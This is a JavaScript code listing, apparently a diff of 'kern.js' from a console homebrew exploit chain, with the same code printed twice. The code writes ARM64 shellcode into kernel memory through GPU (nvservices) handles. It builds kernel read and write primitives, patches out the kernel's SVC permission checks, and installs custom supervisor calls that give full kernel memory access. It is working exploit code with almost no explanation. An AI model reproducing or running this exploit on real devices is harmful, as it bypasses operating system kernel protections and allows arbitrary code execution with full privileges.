SciresM · April 17, 2019 18:23
diff --git a/kern.js b/kern.js
 var shellcode = [0x01, 0x08, 0x40, 0xF9,
 0x02, 0x0C, 0x40, 0xF9,
 0x41, 0x00, 0x00, 0xF9,
 0xC0, 0x03, 0x5F, 0xD6]; //     ret

 var entry = sc.nv.getFirstFreeHandleEntry();
 for (var i = 0; i < shellcode.length; i++) {
    sc.nv.kernWriteU8(shellcode[i], utils.add2([0xA0000, 0xFFFFFFFE], 0x45E00 + i), entry);
 }

 var base = sc.nv.physAddr + sc.nv.offsets['free_space'] + 0x100;

 sc.nv.kernBuf = utils.add2(sc.nv.nv_base, 0x13F700);
 sc.nv.kernBufPhys = sc.nv.physAddr + (utils.sub2(sc.nv.kernBuf, sc.nv.nv_base)[0]);

 function phys2KVirt(x) {
    return [(x & 0x0FFFFFFF), 0xFFFFFFFE];
 }

 utils.log('Creating NV object...');
 sc.nv.write8([0xFFFFFFFE, 0x1], utils.add2(sc.nv.kernBuf, 4));
 for (var i = 0; i < 0x100; i+=8) { sc.nv.write8([0xBFC45E00, 0xFFFFFFFF], utils.add2(sc.nv.kernBuf, 0x100 + i)); }
 for (var i = 0; i < 0x100; i+=8) { sc.nv.write8([0xBFC45E10, 0xFFFFFFFF], utils.add2(sc.nv.kernBuf, 0x200 + i)); }


 var entry = sc.nv.getFirstFreeHandleEntry();

 sc.nv.kernWrite = function(val, addr) {
    if (typeof(val) == 'number') {
        val = [val, 0];
    }
    var hnd1 = sc.nv.createSharedMemory(0x1000);
    sc.nv.gpuWrite(((sc.nv.kernBufPhys & 0x0FFFFFFF)), entry + 8);
    sc.nv.write8([(sc.nv.kernBufPhys & 0x0FFFFFFF) + 0x100, 0xFFFFFFFE], sc.nv.kernBuf);
    sc.nv.write8(val, utils.add2(sc.nv.kernBuf, 0x10));
    sc.nv.write8(addr, utils.add2(sc.nv.kernBuf, 0x18));
    sc.nv.closeHandle(hnd1);
 }

 sc.nv.kernRead = function(addr) {
    var hnd1 = sc.nv.createSharedMemory(0x1000);
    sc.nv.gpuWrite(((sc.nv.kernBufPhys & 0x0FFFFFFF)), entry + 8);
    sc.nv.write8([(sc.nv.kernBufPhys & 0x0FFFFFFF) + 0x200, 0xFFFFFFFE], sc.nv.kernBuf);
    sc.nv.write8(addr, utils.add2(sc.nv.kernBuf, 0x18));
    sc.nv.closeHandle(hnd1);
    return sc.nv.read8(utils.add2(sc.nv.kernBuf, 0x10));
 }

 sc.nv.kernWrite([0xCAFEBABE, 0xDEADCAFE], phys2KVirt(base + 0x60));
 utils.log('Verifying kernel write: '+utils.paddr(sc.nv.gpuRead(base + 0x60)));
 utils.log('Creating Read primitive...');
 sc.nv.kernWrite([0x11111111, 0x22222222], phys2KVirt(base + 0x60));
 sc.nv.kernWrite([0xF9400C01, 0xF9400021], utils.add2([0xA0000, 0xFFFFFFFE], 0x45E10));
 sc.nv.kernWrite([0xF9000801, 0xD65F03C0], utils.add2([0xA0000, 0xFFFFFFFE], 0x45E18));
 utils.log('Verifying kernel read: '+utils.paddr(sc.nv.kernRead(phys2KVirt(base + 0x60))));

 utils.log('Patching out SVC checks...');
 sc.nv.kernWrite([0xD503201F, 0xD503201F], utils.add2([0xA0000, 0xFFFFFFFE], 0x35820));
 sc.nv.kernWrite([0xD503201F, 0xD503201F], utils.add2([0xA0000, 0xFFFFFFFE], 0x35648));

 utils.log('Installing custom SVCs...');
 sc.nv.kernWrite([0xF9000020, 0x2A1F03E0], utils.add2([0xA0000, 0xFFFFFFFE], 0x45F00));
 sc.nv.kernWrite([0xD65F03C0, 0xF9400001], utils.add2([0xA0000, 0xFFFFFFFE], 0x45F08));
 sc.nv.kernWrite([0x2A1F03E0, 0xD65F03C0], utils.add2([0xA0000, 0xFFFFFFFE], 0x45F10));
 sc.nv.kernWrite(utils.add2([0xBFC00000, 0xFFFFFFFF], 0x45F00), utils.add2([0xA0000, 0xFFFFFFFE], 0x470D0 + 0x8 * 0x6E));
 sc.nv.kernWrite(utils.add2([0xBFC00000, 0xFFFFFFFF], 0x45F0C), utils.add2([0xA0000, 0xFFFFFFFE], 0x470D0 + 0x8 * 0x6F));
 sc.nv.kernWrite(utils.add2([0xBFC00000, 0xFFFFFFFF], 0x45F00), utils.add2([0xA0000, 0xFFFFFFFE], 0x474D0 + 0x8 * 0x6E));
 sc.nv.kernWrite(utils.add2([0xBFC00000, 0xFFFFFFFF], 0x45F0C), utils.add2([0xA0000, 0xFFFFFFFE], 0x474D0 + 0x8 * 0x6F));
 utils.log('Testing SVC access...');
 utils.log(utils.paddr((sc.nv.svc(0x78, [sc.nv.scratch, 0, 0, 0]))));
 utils.log('Verified SVC access!');
 sc.nv.kernWrite = function(val, addr) {
    sc.nv.svc(0x6E, [val, addr]);
 }

 sc.nv.kernRead = function(addr) {
    sc.nv.svc(0x6F, [addr]);
 }

 utils.log('Testing Kernel RW SVCs!');

 sc.nv.kernWrite([0xCAFEBABE, 0xDEADCAFE], [0, 0xFFFFFFFE]);
 utils.log(utils.paddr(sc.nv.kernRead([0, 0xFFFFFFFE])));
 utils.log('Verified Kernel RW SVCs!');
	var shellcode = [0x01, 0x08, 0x40, 0xF9,
	0x02, 0x0C, 0x40, 0xF9,
	0x41, 0x00, 0x00, 0xF9,
	0xC0, 0x03, 0x5F, 0xD6]; // ret

	var entry = sc.nv.getFirstFreeHandleEntry();
	for (var i = 0; i < shellcode.length; i++) {
	sc.nv.kernWriteU8(shellcode[i], utils.add2([0xA0000, 0xFFFFFFFE], 0x45E00 + i), entry);
	}

	var base = sc.nv.physAddr + sc.nv.offsets['free_space'] + 0x100;

	sc.nv.kernBuf = utils.add2(sc.nv.nv_base, 0x13F700);
	sc.nv.kernBufPhys = sc.nv.physAddr + (utils.sub2(sc.nv.kernBuf, sc.nv.nv_base)[0]);

	function phys2KVirt(x) {
	return [(x & 0x0FFFFFFF), 0xFFFFFFFE];
	}

	utils.log('Creating NV object...');
	sc.nv.write8([0xFFFFFFFE, 0x1], utils.add2(sc.nv.kernBuf, 4));
	for (var i = 0; i < 0x100; i+=8) { sc.nv.write8([0xBFC45E00, 0xFFFFFFFF], utils.add2(sc.nv.kernBuf, 0x100 + i)); }
	for (var i = 0; i < 0x100; i+=8) { sc.nv.write8([0xBFC45E10, 0xFFFFFFFF], utils.add2(sc.nv.kernBuf, 0x200 + i)); }


	var entry = sc.nv.getFirstFreeHandleEntry();

	sc.nv.kernWrite = function(val, addr) {
	if (typeof(val) == 'number') {
	val = [val, 0];
	}
	var hnd1 = sc.nv.createSharedMemory(0x1000);
	sc.nv.gpuWrite(((sc.nv.kernBufPhys & 0x0FFFFFFF)), entry + 8);
	sc.nv.write8([(sc.nv.kernBufPhys & 0x0FFFFFFF) + 0x100, 0xFFFFFFFE], sc.nv.kernBuf);
	sc.nv.write8(val, utils.add2(sc.nv.kernBuf, 0x10));
	sc.nv.write8(addr, utils.add2(sc.nv.kernBuf, 0x18));
	sc.nv.closeHandle(hnd1);
	}

	sc.nv.kernRead = function(addr) {
	var hnd1 = sc.nv.createSharedMemory(0x1000);
	sc.nv.gpuWrite(((sc.nv.kernBufPhys & 0x0FFFFFFF)), entry + 8);
	sc.nv.write8([(sc.nv.kernBufPhys & 0x0FFFFFFF) + 0x200, 0xFFFFFFFE], sc.nv.kernBuf);
	sc.nv.write8(addr, utils.add2(sc.nv.kernBuf, 0x18));
	sc.nv.closeHandle(hnd1);
	return sc.nv.read8(utils.add2(sc.nv.kernBuf, 0x10));
	}

	sc.nv.kernWrite([0xCAFEBABE, 0xDEADCAFE], phys2KVirt(base + 0x60));
	utils.log('Verifying kernel write: '+utils.paddr(sc.nv.gpuRead(base + 0x60)));
	utils.log('Creating Read primitive...');
	sc.nv.kernWrite([0x11111111, 0x22222222], phys2KVirt(base + 0x60));
	sc.nv.kernWrite([0xF9400C01, 0xF9400021], utils.add2([0xA0000, 0xFFFFFFFE], 0x45E10));
	sc.nv.kernWrite([0xF9000801, 0xD65F03C0], utils.add2([0xA0000, 0xFFFFFFFE], 0x45E18));
	utils.log('Verifying kernel read: '+utils.paddr(sc.nv.kernRead(phys2KVirt(base + 0x60))));

	utils.log('Patching out SVC checks...');
	sc.nv.kernWrite([0xD503201F, 0xD503201F], utils.add2([0xA0000, 0xFFFFFFFE], 0x35820));
	sc.nv.kernWrite([0xD503201F, 0xD503201F], utils.add2([0xA0000, 0xFFFFFFFE], 0x35648));

	utils.log('Installing custom SVCs...');
	sc.nv.kernWrite([0xF9000020, 0x2A1F03E0], utils.add2([0xA0000, 0xFFFFFFFE], 0x45F00));
	sc.nv.kernWrite([0xD65F03C0, 0xF9400001], utils.add2([0xA0000, 0xFFFFFFFE], 0x45F08));
	sc.nv.kernWrite([0x2A1F03E0, 0xD65F03C0], utils.add2([0xA0000, 0xFFFFFFFE], 0x45F10));
	sc.nv.kernWrite(utils.add2([0xBFC00000, 0xFFFFFFFF], 0x45F00), utils.add2([0xA0000, 0xFFFFFFFE], 0x470D0 + 0x8 * 0x6E));
	sc.nv.kernWrite(utils.add2([0xBFC00000, 0xFFFFFFFF], 0x45F0C), utils.add2([0xA0000, 0xFFFFFFFE], 0x470D0 + 0x8 * 0x6F));
	sc.nv.kernWrite(utils.add2([0xBFC00000, 0xFFFFFFFF], 0x45F00), utils.add2([0xA0000, 0xFFFFFFFE], 0x474D0 + 0x8 * 0x6E));
	sc.nv.kernWrite(utils.add2([0xBFC00000, 0xFFFFFFFF], 0x45F0C), utils.add2([0xA0000, 0xFFFFFFFE], 0x474D0 + 0x8 * 0x6F));
	utils.log('Testing SVC access...');
	utils.log(utils.paddr((sc.nv.svc(0x78, [sc.nv.scratch, 0, 0, 0]))));
	utils.log('Verified SVC access!');
	sc.nv.kernWrite = function(val, addr) {
	sc.nv.svc(0x6E, [val, addr]);
	}

	sc.nv.kernRead = function(addr) {
	sc.nv.svc(0x6F, [addr]);
	}

	utils.log('Testing Kernel RW SVCs!');

	sc.nv.kernWrite([0xCAFEBABE, 0xDEADCAFE], [0, 0xFFFFFFFE]);
	utils.log(utils.paddr(sc.nv.kernRead([0, 0xFFFFFFFE])));
	utils.log('Verified Kernel RW SVCs!');